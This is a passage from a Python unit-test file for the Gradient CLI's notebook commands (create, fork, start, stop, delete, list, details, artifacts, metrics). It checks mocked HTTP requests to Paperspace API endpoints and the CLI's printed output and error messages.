@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_send_post_request_and_print_notebook_id_when_all_options_were_used(self, post_patched, get_patched):
post_patched.return_value = MockResponse(self.EXPECTED_RESPONSE_JSON)
get_patched.return_value = MockResponse(example_responses.NOTEBOOK_GET_RESPONSE)
runner = CliRunner()
result = runner.invoke(cli.cli, self.COMMAND_WITH_ALL_OPTIONS)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
post_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS,
json=self.EXPECTED_REQUEST_JSON_WITH_ALL_OPTIONS,
data=None,
files=None,
params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_read_option_from_yaml_file(self, post_patched, get_patched, notebooks_create_config_path):
post_patched.return_value = MockResponse(self.EXPECTED_RESPONSE_JSON)
get_patched.return_value = MockResponse(example_responses.NOTEBOOK_GET_RESPONSE)
command = self.COMMAND_WITH_OPTIONS_FILE_USED[:] + [notebooks_create_config_path]
runner = CliRunner()
result = runner.invoke(cli.cli, command)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
post_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
json=self.EXPECTED_REQUEST_JSON_WITH_ALL_OPTIONS,
data=None,
files=None,
params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_print_valid_error_message_when_command_was_used_with_invalid_api_token(self, post_patched):
post_patched.return_value = MockResponse(self.RESPONSE_JSON_WITH_WRONG_API_TOKEN, 400)
cli_runner = CliRunner()
result = cli_runner.invoke(cli.cli, self.COMMAND)
assert result.output == self.EXPECTED_STDOUT_WITH_WRONG_API_TOKEN, result.exc_info
post_patched.assert_called_with(self.URL,
headers=EXPECTED_HEADERS,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
assert result.exit_code == 0
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_print_valid_error_message_when_no_content_was_received_in_response(self, post_patched):
post_patched.return_value = MockResponse(status_code=400)
cli_runner = CliRunner()
result = cli_runner.invoke(cli.cli, self.COMMAND)
assert result.output == "Failed to create resource\n", result.exc_info
post_patched.assert_called_with(self.URL,
headers=EXPECTED_HEADERS,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
assert result.exit_code == 0
# TODO: Add test case for creating notebook with tag
class TestNotebooksFork(object):
URL = "https://api.paperspace.io/notebooks/v2/forkNotebook"
COMMAND = [
"notebooks",
"fork",
"--id", "n1234",
]
EXPECTED_REQUEST_JSON = {
"notebookId": "n1234",
}
EXPECTED_RESPONSE_JSON = {
"handle": "n1234",
"notebookToken": None,
"jobId": 20163,
"isPublic": False,
"id": 1811,
}
EXPECTED_STDOUT = "Notebook forked to id: n1234\n"
COMMAND_WITH_API_KEY_USED = [
"notebooks",
"fork",
"--id", "n1234",
"--apiKey", "some_key",
]
RESPONSE_JSON_WITH_WRONG_API_TOKEN = {"status": 400, "message": "Invalid API token"}
EXPECTED_STDOUT_WITH_WRONG_API_TOKEN = "Failed to fork notebook: Invalid API token\n"
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_send_post_request_and_print_notebook_id(self, post_patched):
post_patched.return_value = MockResponse(self.EXPECTED_RESPONSE_JSON)
runner = CliRunner()
result = runner.invoke(cli.cli, self.COMMAND)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
post_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_send_changed_headers_when_api_key_option_was_used(self, post_patched):
post_patched.return_value = MockResponse(self.EXPECTED_RESPONSE_JSON)
runner = CliRunner()
result = runner.invoke(cli.cli, self.COMMAND_WITH_API_KEY_USED)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
post_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_print_valid_error_message_when_command_was_used_with_invalid_api_token(self, post_patched):
post_patched.return_value = MockResponse(self.RESPONSE_JSON_WITH_WRONG_API_TOKEN, 400)
cli_runner = CliRunner()
result = cli_runner.invoke(cli.cli, self.COMMAND)
assert result.output == self.EXPECTED_STDOUT_WITH_WRONG_API_TOKEN, result.exc_info
post_patched.assert_called_with(self.URL,
headers=EXPECTED_HEADERS,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
assert result.exit_code == 0
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_print_valid_error_message_when_no_content_was_received_in_response(self, post_patched):
post_patched.return_value = MockResponse(status_code=400)
cli_runner = CliRunner()
result = cli_runner.invoke(cli.cli, self.COMMAND)
assert result.output == "Failed to fork notebook\n", result.exc_info
post_patched.assert_called_with(self.URL,
headers=EXPECTED_HEADERS,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
assert result.exit_code == 0
class TestNotebooksStart(object):
URL = "https://api.paperspace.io/notebooks/v2/startNotebook"
COMMAND = [
"notebooks",
"start",
"--id", "n123",
"--machineType", "c5.xlarge",
"--clusterId", "cl123",
]
EXPECTED_REQUEST_JSON = {
"notebookId": "n123",
"vmTypeLabel": "c5.xlarge",
"clusterId": "cl123",
"isPreemptible": False,
}
EXPECTED_RESPONSE_JSON = {
"handle": "n123",
"notebookToken": None,
"jobId": 20163,
"isPublic": False,
"id": 1811,
"containerId": 123,
}
EXPECTED_STDOUT = "Started notebook with id: n123\n"
COMMAND_WITH_API_KEY_USED = [
"notebooks",
"start",
"--id", "n123",
"--machineType", "c5.xlarge",
"--clusterId", "cl123",
"--apiKey", "some_key",
]
RESPONSE_JSON_WITH_WRONG_API_TOKEN = {"status": 400, "message": "Invalid API token"}
EXPECTED_STDOUT_WITH_WRONG_API_TOKEN = "Failed to create resource: Invalid API token\n"
EXPECTED_STDOUT_WITH_KEY = "Started notebook with id: n123\n" \
"https://www.paperspace.com/some_namespace/notebook/prg284tu2\n"
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_send_changed_headers_when_api_key_option_was_used(self, post_patched, get_patched):
post_patched.return_value = MockResponse(self.EXPECTED_RESPONSE_JSON)
get_patched.return_value = MockResponse(example_responses.NOTEBOOK_GET_RESPONSE)
runner = CliRunner()
result = runner.invoke(cli.cli, self.COMMAND_WITH_API_KEY_USED)
assert result.output == self.EXPECTED_STDOUT_WITH_KEY, result.exc_info
post_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_print_valid_error_message_when_command_was_used_with_invalid_api_token(self, post_patched):
post_patched.return_value = MockResponse(self.RESPONSE_JSON_WITH_WRONG_API_TOKEN, 400)
cli_runner = CliRunner()
result = cli_runner.invoke(cli.cli, self.COMMAND)
assert result.output == self.EXPECTED_STDOUT_WITH_WRONG_API_TOKEN, result.exc_info
post_patched.assert_called_with(self.URL,
headers=EXPECTED_HEADERS,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
assert result.exit_code == 0
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_print_valid_error_message_when_no_content_was_received_in_response(self, post_patched):
post_patched.return_value = MockResponse(status_code=400)
cli_runner = CliRunner()
result = cli_runner.invoke(cli.cli, self.COMMAND)
assert result.output == "Failed to create resource\n", result.exc_info
post_patched.assert_called_with(self.URL,
headers=EXPECTED_HEADERS,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
assert result.exit_code == 0
class TestNotebooksStop(object):
URL = "https://api.paperspace.io/notebooks/v2/stopNotebook"
COMMAND = [
"notebooks",
"stop",
"--id", "n123",
]
EXPECTED_REQUEST_JSON = {
"notebookId": 'n123',
}
EXPECTED_STDOUT = "Stopping notebook with id: n123\n"
COMMAND_WITH_API_KEY_USED = [
"notebooks",
"stop",
"--id", "n123",
"--apiKey", "some_key",
]
RESPONSE_JSON_WITH_WRONG_API_TOKEN = {"status": 400, "message": "Invalid API token"}
EXPECTED_STDOUT_WITH_WRONG_API_TOKEN = "Unable to stop instance: Invalid API token\n"
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_send_post_request_and_print_notebook_id(self, post_patched):
post_patched.return_value = MockResponse(example_responses.NOTEBOOK_GET_RESPONSE)
runner = CliRunner()
result = runner.invoke(cli.cli, self.COMMAND)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
post_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_send_changed_headers_when_api_key_option_was_used(self, post_patched, get_patched):
post_patched.return_value = MockResponse(example_responses.NOTEBOOK_GET_RESPONSE)
get_patched.return_value = MockResponse(example_responses.NOTEBOOK_GET_RESPONSE)
runner = CliRunner()
result = runner.invoke(cli.cli, self.COMMAND_WITH_API_KEY_USED)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
post_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_print_valid_error_message_when_command_was_used_with_invalid_api_token(self, post_patched):
post_patched.return_value = MockResponse(self.RESPONSE_JSON_WITH_WRONG_API_TOKEN, 400)
cli_runner = CliRunner()
result = cli_runner.invoke(cli.cli, self.COMMAND)
assert result.output == self.EXPECTED_STDOUT_WITH_WRONG_API_TOKEN, result.exc_info
post_patched.assert_called_with(self.URL,
headers=EXPECTED_HEADERS,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
assert result.exit_code == 0
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_print_valid_error_message_when_no_content_was_received_in_response(self, post_patched):
post_patched.return_value = MockResponse(status_code=400)
cli_runner = CliRunner()
result = cli_runner.invoke(cli.cli, self.COMMAND)
assert result.output == "Unable to stop instance\n", result.exc_info
post_patched.assert_called_with(self.URL,
headers=EXPECTED_HEADERS,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
assert result.exit_code == 0
class TestListNotebookArtifacts(object):
runner = CliRunner()
URL = "https://api.paperspace.io/notebooks/artifactsList"
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_send_valid_get_request_with_all_parameters_for_a_list_of_artifacts(self, get_patched):
get_patched.return_value = MockResponse()
notebook_id = "some_notebook_id"
result = self.runner.invoke(cli.cli,
["notebooks", "artifacts", "list", "--id", notebook_id, "--apiKey", "some_key", "--size",
"--links",
"--files", "foo"])
get_patched.assert_called_with(self.URL,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
json=None,
params={"notebookId": notebook_id,
"size": True,
"links": True,
"files": "foo"})
assert result.exit_code == 0
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
@pytest.mark.parametrize('option,param', [("--size", "size"),
("-s", "size"),
("--links", "links"),
("-l", "links")])
def test_should_send_valid_get_request_with_valid_param_for_a_list_of_artifacts_for_both_formats_of_param(self,
get_patched,
option,
param):
get_patched.return_value = MockResponse(status_code=200)
notebook_id = "some_notebook_id"
result = self.runner.invoke(cli.cli,
["notebooks", "artifacts", "list", "--id", notebook_id, "--apiKey", "some_key"] + [option])
get_patched.assert_called_with(self.URL,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
json=None,
params={"notebookId": notebook_id,
param: True})
assert result.exit_code == 0
class TestNotebooksDelete(object):
URL = "https://api.paperspace.io/notebooks/v2/deleteNotebook"
COMMAND = [
"notebooks",
"delete",
"--id", "some_id",
]
EXPECTED_REQUEST_JSON = {"notebookId": "some_id"}
EXPECTED_STDOUT = "Notebook deleted\n"
COMMAND_WITH_API_KEY_USED = [
"notebooks",
"delete",
"--id", "some_id",
"--apiKey", "some_key",
]
COMMAND_WITH_OPTIONS_FILE_USED = ["notebooks", "delete", "--optionsFile", ] # path added in test
RESPONSE_JSON_WITH_WRONG_API_TOKEN = {"status": 400, "message": "Invalid API token"}
EXPECTED_STDOUT_WITH_WRONG_API_TOKEN = "Failed to delete resource: Invalid API token\n"
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_send_post_request_and_print_notebook_id(self, post_patched):
post_patched.return_value = MockResponse(status_code=204)
runner = CliRunner()
result = runner.invoke(cli.cli, self.COMMAND)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
post_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_send_changed_headers_when_api_key_option_was_used(self, post_patched):
post_patched.return_value = MockResponse(status_code=204)
runner = CliRunner()
result = runner.invoke(cli.cli, self.COMMAND_WITH_API_KEY_USED)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
post_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_read_option_from_yaml_file(self, post_patched, notebooks_delete_config_path):
post_patched.return_value = MockResponse(status_code=204)
command = self.COMMAND_WITH_OPTIONS_FILE_USED[:] + [notebooks_delete_config_path]
runner = CliRunner()
result = runner.invoke(cli.cli, command)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
post_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
    def test_should_print_valid_error_message_when_command_was_used_with_invalid_api_token(self, post_patched):
        post_patched.return_value = MockResponse(self.RESPONSE_JSON_WITH_WRONG_API_TOKEN, 400)
        cli_runner = CliRunner()
        result = cli_runner.invoke(cli.cli, self.COMMAND)
        assert result.output == self.EXPECTED_STDOUT_WITH_WRONG_API_TOKEN, result.exc_info
        post_patched.assert_called_with(self.URL,
                                        headers=EXPECTED_HEADERS,
                                        json=self.EXPECTED_REQUEST_JSON,
                                        data=None,
                                        files=None,
                                        params=None)
assert result.exit_code == 0
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
    def test_should_print_valid_error_message_when_no_content_was_received_in_response(self, post_patched):
        post_patched.return_value = MockResponse(status_code=400)
        cli_runner = CliRunner()
        result = cli_runner.invoke(cli.cli, self.COMMAND)
        assert result.output == "Failed to delete resource\n", result.exc_info
        post_patched.assert_called_with(self.URL,
                                        headers=EXPECTED_HEADERS,
                                        json=self.EXPECTED_REQUEST_JSON,
                                        data=None,
                                        files=None,
                                        params=None)
assert result.exit_code == 0
class TestNotebooksDetails(object):
URL = "https://api.paperspace.io/notebooks/getNotebook"
COMMAND = ["notebooks", "details", "--id", "some_id"]
EXPECTED_STDOUT = """+---------+-----------------------------------+
| Name | some_name |
+---------+-----------------------------------+
| ID | ngw7piq9 |
| VM Type | K80 |
| State | Running |
| FQDN | ngw7piq9.dgradient.paperspace.com |
| Tags | |
+---------+-----------------------------------+
"""
EXPECTED_STDOUT_WITH_TAGS = """+---------+-----------------------------------+
| Name | some_name |
+---------+-----------------------------------+
| ID | ngw7piq9 |
| VM Type | K80 |
| State | Running |
| FQDN | ngw7piq9.dgradient.paperspace.com |
| Tags | tag1, tag2 |
+---------+-----------------------------------+
"""
RESPONSE_JSON = example_responses.NOTEBOOK_GET_RESPONSE
RESPONSE_JSON_WITH_TAGS = example_responses.NOTEBOOK_GET_RESPONSE_WITH_TAGS
COMMAND_WITH_API_KEY_USED = ["notebooks", "details", "--id", "some_id", "--apiKey", "some_key"]
COMMAND_WITH_OPTIONS_FILE_USED = ["notebooks", "details", "--optionsFile", ] # path added in test
RESPONSE_JSON_WITH_WRONG_API_TOKEN = {"status": 400, "message": "Invalid API token"}
EXPECTED_STDOUT_WITH_WRONG_API_TOKEN = "Failed to fetch data: Invalid API token\n"
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
    def test_should_send_get_request_and_print_notebook_details(self, get_patched):
        get_patched.return_value = MockResponse(self.RESPONSE_JSON)
        runner = CliRunner()
        result = runner.invoke(cli.cli, self.COMMAND)
        assert result.output == self.EXPECTED_STDOUT, result.exc_info
        get_patched.assert_called_once_with(self.URL,
                                            headers=EXPECTED_HEADERS,
                                            json={"notebookId": "some_id"},
                                            params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
    def test_should_send_get_request_and_print_notebook_details_with_tags(self, get_patched):
        get_patched.return_value = MockResponse(self.RESPONSE_JSON_WITH_TAGS)
        runner = CliRunner()
        result = runner.invoke(cli.cli, self.COMMAND)
        assert result.output == self.EXPECTED_STDOUT_WITH_TAGS, result.exc_info
        get_patched.assert_called_once_with(self.URL,
                                            headers=EXPECTED_HEADERS,
                                            json={"notebookId": "some_id"},
                                            params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
    def test_should_send_changed_headers_when_api_key_option_was_used(self, get_patched):
        get_patched.return_value = MockResponse(self.RESPONSE_JSON)
        runner = CliRunner()
        result = runner.invoke(cli.cli, self.COMMAND_WITH_API_KEY_USED)
        assert result.output == self.EXPECTED_STDOUT, result.exc_info
        get_patched.assert_called_once_with(self.URL,
                                            headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
                                            json={"notebookId": "some_id"},
                                            params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
    def test_should_read_option_from_yaml_file(self, get_patched, notebooks_show_config_path):
        get_patched.return_value = MockResponse(self.RESPONSE_JSON)
        command = self.COMMAND_WITH_OPTIONS_FILE_USED[:] + [notebooks_show_config_path]
        runner = CliRunner()
        result = runner.invoke(cli.cli, command)
        assert result.output == self.EXPECTED_STDOUT, result.exc_info
        get_patched.assert_called_once_with(self.URL,
                                            headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
                                            json={"notebookId": "some_id"},
                                            params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_print_valid_error_message_when_command_was_used_with_invalid_api_token(self, get_patched):
get_patched.return_value = MockResponse(self.RESPONSE_JSON_WITH_WRONG_API_TOKEN, 400)
cli_runner = CliRunner()
result = cli_runner.invoke(cli.cli, self.COMMAND)
assert result.output == self.EXPECTED_STDOUT_WITH_WRONG_API_TOKEN, result.exc_info
get_patched.assert_called_with(self.URL,
headers=EXPECTED_HEADERS,
json={"notebookId": "some_id"},
params=None)
assert result.exit_code == 0
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_print_valid_error_message_when_no_content_was_received_in_response(self, get_patched):
get_patched.return_value = MockResponse(status_code=400)
cli_runner = CliRunner()
result = cli_runner.invoke(cli.cli, self.COMMAND)
assert result.output == "Failed to fetch data\n", result.exc_info
get_patched.assert_called_with(self.URL,
headers=EXPECTED_HEADERS,
json={"notebookId": "some_id"},
params=None)
assert result.exit_code == 0
class TestNotebooksList(object):
URL = "https://api.paperspace.io/notebooks/getNotebooks"
COMMAND = ["notebooks", "list"]
COMMAND_WITH_FILTERING_BY_TAGS = [
"notebooks", "list",
"--tag", "tag1",
"--tag", "tag2",
]
EXPECTED_STDOUT = """+--------------------+----------+
| Name | ID |
+--------------------+----------+
| job 1 | n1vmfj6x |
| job 1 | nhdf8zf3 |
| My Notebook 123 | nslk5r03 |
| My Notebook 123 | ng9a3tp4 |
| some_name | ngw7piq9 |
| some_notebook_name | n8h0d5lf |
| some_notebook_name | nl0b6cn0 |
| some_notebook_name | njmq1zju |
| some_notebook_name | nfcuwqu5 |
+--------------------+----------+
"""
RESPONSE_JSON = example_responses.NOTEBOOKS_LIST_RESPONSE_JSON
COMMAND_WITH_API_KEY_USED = ["notebooks", "list", "--apiKey", "some_key"]
COMMAND_WITH_OPTIONS_FILE_USED = ["notebooks", "list", "--optionsFile", ] # path added in test
EXPECTED_FILTERS = {
"filter": {
"where": {
"dtDeleted": None,
},
"limit": 20,
"order": "jobId desc",
"offset": 0,
},
}
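    # The CLI serializes the filter as a single JSON string under the "filter"
    # query parameter, which is why the assertions below recover it with
    # json.loads before comparing it to EXPECTED_FILTERS. A minimal sketch of
    # that round trip (the encoding step is an assumption inferred from the
    # assertions):
    #     params = {"filter": json.dumps(EXPECTED_FILTERS)}
    #     assert json.loads(params["filter"]) == EXPECTED_FILTERS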
RESPONSE_JSON_WITH_WRONG_API_TOKEN = {"status": 400, "message": "Invalid API token"}
EXPECTED_STDOUT_WITH_WRONG_API_TOKEN = "Failed to fetch data: Invalid API token\n"
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
    def test_should_send_get_request_and_print_list_of_notebooks(self, get_patched):
        get_patched.return_value = MockResponse(self.RESPONSE_JSON)
        runner = CliRunner()
        result = runner.invoke(cli.cli, self.COMMAND)
        assert result.output == self.EXPECTED_STDOUT, result.exc_info
        get_patched.assert_called_once_with(self.URL,
                                            headers=EXPECTED_HEADERS,
                                            json=None,
                                            params=mock.ANY)
        params = get_patched.call_args.kwargs["params"]
        filter_params = params["filter"]
        filter_params = json.loads(filter_params)
        assert filter_params == self.EXPECTED_FILTERS
        assert "tagFilter[0]" not in params
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
    def test_should_send_get_request_and_print_list_of_notebooks_when_filtering_by_tags(self, get_patched):
        get_patched.return_value = MockResponse(self.RESPONSE_JSON)
        runner = CliRunner()
        result = runner.invoke(cli.cli, self.COMMAND_WITH_FILTERING_BY_TAGS)
        assert result.output == self.EXPECTED_STDOUT, result.exc_info
        get_patched.assert_called_once_with(self.URL,
                                            headers=EXPECTED_HEADERS,
                                            json=None,
                                            params=mock.ANY)
        params = get_patched.call_args.kwargs["params"]
        filter_params = params["filter"]
        filter_params = json.loads(filter_params)
        assert filter_params == self.EXPECTED_FILTERS
        assert "tagFilter[0]" in params
        assert params["tagFilter[0]"] in ("tag1", "tag2")
        assert params["tagFilter[1]"] in ("tag1", "tag2")
        assert params["tagFilter[0]"] != params["tagFilter[1]"]
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_send_changed_headers_when_api_key_option_was_used(self, get_patched):
get_patched.return_value = MockResponse(self.RESPONSE_JSON)
runner = CliRunner()
result = runner.invoke(cli.cli, self.COMMAND_WITH_API_KEY_USED)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
get_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
json=None,
params=mock.ANY)
params = get_patched.call_args.kwargs["params"]
filter_params = params["filter"]
filter_params = json.loads(filter_params)
assert filter_params == self.EXPECTED_FILTERS
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_read_option_from_yaml_file(self, get_patched, notebooks_list_config_path):
get_patched.return_value = MockResponse(self.RESPONSE_JSON)
command = self.COMMAND_WITH_OPTIONS_FILE_USED[:] + [notebooks_list_config_path]
runner = CliRunner()
result = runner.invoke(cli.cli, command)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
get_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
json=None,
params=mock.ANY)
params = get_patched.call_args.kwargs["params"]
filter_params = params["filter"]
filter_params = json.loads(filter_params)
assert filter_params == self.EXPECTED_FILTERS
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_print_valid_error_message_when_command_was_used_with_invalid_api_token(self, get_patched):
get_patched.return_value = MockResponse(self.RESPONSE_JSON_WITH_WRONG_API_TOKEN, 400)
cli_runner = CliRunner()
result = cli_runner.invoke(cli.cli, self.COMMAND)
assert result.output == self.EXPECTED_STDOUT_WITH_WRONG_API_TOKEN, result.exc_info
get_patched.assert_called_with(self.URL,
headers=EXPECTED_HEADERS,
json=None,
params=mock.ANY)
params = get_patched.call_args.kwargs["params"]
filter_params = params["filter"]
filter_params = json.loads(filter_params)
assert filter_params == self.EXPECTED_FILTERS
assert result.exit_code == 0
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_print_valid_error_message_when_no_content_was_received_in_response(self, get_patched):
get_patched.return_value = MockResponse(status_code=400)
cli_runner = CliRunner()
result = cli_runner.invoke(cli.cli, self.COMMAND)
assert result.output == "Failed to fetch data\n", result.exc_info
get_patched.assert_called_with(self.URL,
headers=EXPECTED_HEADERS,
json=None,
params=mock.ANY)
params = get_patched.call_args.kwargs["params"]
filter_params = params["filter"]
filter_params = json.loads(filter_params)
assert filter_params == self.EXPECTED_FILTERS
assert result.exit_code == 0
class TestNotebooksMetricsGetCommand(object):
GET_NOTEBOOK_URL = "https://api.paperspace.io/notebooks/getNotebook"
GET_METRICS_URL = "https://aws-testing.paperspace.io/metrics/api/v1/range"
BASIC_OPTIONS_COMMAND = [
"notebooks", "metrics", "get",
"--id", "ngw7piq9",
]
ALL_OPTIONS_COMMAND = [
"notebooks", "metrics", "get",
"--id", "ngw7piq9",
"--metric", "gpuMemoryFree",
"--metric", "gpuMemoryUsed",
"--interval", "20s",
"--start", "2020-04-01",
"--end", "2020-04-02 21:37:00",
"--apiKey", "some_key",
]
FULL_OPTIONS_COMMAND_WITH_OPTIONS_FILE = [
"notebooks", "metrics", "get",
"--optionsFile", # path added in test,
]
GET_NOTEBOOK_REQUEST_JSON = {"notebookId": "ngw7piq9"}
BASIC_COMMAND_GET_METRICS_REQUEST_PARAMS = {
"start": "2019-09-03T11:10:36Z",
"handle": "ngw7piq9",
"interval": "30s",
"charts": "cpuPercentage,memoryUsage",
"objecttype": "notebook",
}
ALL_COMMANDS_GET_METRICS_REQUEST_PARAMS = {
"start": "2020-04-01T00:00:00Z",
"handle": "ngw7piq9",
"interval": "20s",
"charts": "gpuMemoryFree,gpuMemoryUsed",
"objecttype": "notebook",
"end": "2020-04-02T21:37:00Z",
}
GET_NOTEBOOK_RESPONSE_JSON = example_responses.NOTEBOOK_GET_RESPONSE
GET_METRICS_RESPONSE_JSON = example_responses.NOTEBOOKS_METRICS_GET_RESPONSE
EXPECTED_STDOUT = """{
"cpuPercentage": {
"npmnnm6e": [
{
"time_stamp": 1587993000,
"value": "0"
},
{
"time_stamp": 1587993030,
"value": "0"
},
{
"time_stamp": 1587993060,
"value": "0"
},
{
"time_stamp": 1587993090,
"value": "0"
},
{
"time_stamp": 1587993120,
"value": "0"
},
{
"time_stamp": 1587993150,
"value": "0"
},
{
"time_stamp": 1587993180,
"value": "0"
},
{
"time_stamp": 1587993210,
"value": "0"
},
{
"time_stamp": 1587993240,
"value": "0"
},
{
"time_stamp": 1587993270,
"value": "0"
},
{
"time_stamp": 1587993300,
"value": "0"
},
{
"time_stamp": 1587993330,
"value": "0"
},
{
"time_stamp": 1587993360,
"value": "0"
}
]
},
"memoryUsage": {
"npmnnm6e": [
{
"time_stamp": 1587992970,
"value": "0"
},
{
"time_stamp": 1587993000,
"value": "782336"
},
{
"time_stamp": 1587993030,
"value": "782336"
},
{
"time_stamp": 1587993060,
"value": "782336"
},
{
"time_stamp": 1587993090,
"value": "782336"
},
{
"time_stamp": 1587993120,
"value": "782336"
},
{
"time_stamp": 1587993150,
"value": "782336"
},
{
"time_stamp": 1587993180,
"value": "782336"
},
{
"time_stamp": 1587993210,
"value": "782336"
},
{
"time_stamp": 1587993240,
"value": "782336"
},
{
"time_stamp": 1587993270,
"value": "782336"
},
{
"time_stamp": 1587993300,
"value": "782336"
},
{
"time_stamp": 1587993330,
"value": "782336"
},
{
"time_stamp": 1587993360,
"value": "782336"
}
]
}
}
"""
EXPECTED_STDOUT_WHEN_INVALID_API_KEY_WAS_USED = "Failed to fetch data: Invalid API token\n"
    EXPECTED_STDOUT_WHEN_NOTEBOOK_WAS_NOT_FOUND = "Failed to fetch data: Not found. " \
                                                  "Please contact support@paperspace.com for help.\n"
EXPECTED_STDOUT_WHEN_NO_METRICS_WERE_FOUND = """{
"cpuPercentage": null,
"memoryUsage": null
}
"""
EXPECTED_STDOUT_WHEN_ERROR_CODE_WAS_RETURNED_WITHOUT_ERROR_MESSAGE = "Failed to fetch data\n"
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
def test_should_read_all_available_metrics_when_metrics_get_command_was_used_with_basic_options(self, get_patched):
get_patched.side_effect = [
MockResponse(self.GET_NOTEBOOK_RESPONSE_JSON),
MockResponse(self.GET_METRICS_RESPONSE_JSON),
]
runner = CliRunner()
result = runner.invoke(cli.cli, self.BASIC_OPTIONS_COMMAND)
assert json.loads(result.output.strip()) == json.loads(self.EXPECTED_STDOUT.strip()), \
str(result.output) + str(result.exc_info)
get_patched.assert_has_calls(
[
mock.call(
self.GET_NOTEBOOK_URL,
json=self.GET_NOTEBOOK_REQUEST_JSON,
params=None,
headers=EXPECTED_HEADERS,
),
mock.call(
self.GET_METRICS_URL,
json=None,
params=self.BASIC_COMMAND_GET_METRICS_REQUEST_PARAMS,
headers=EXPECTED_HEADERS,
),
]
)
assert result.exit_code == 0, result.exc_info
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
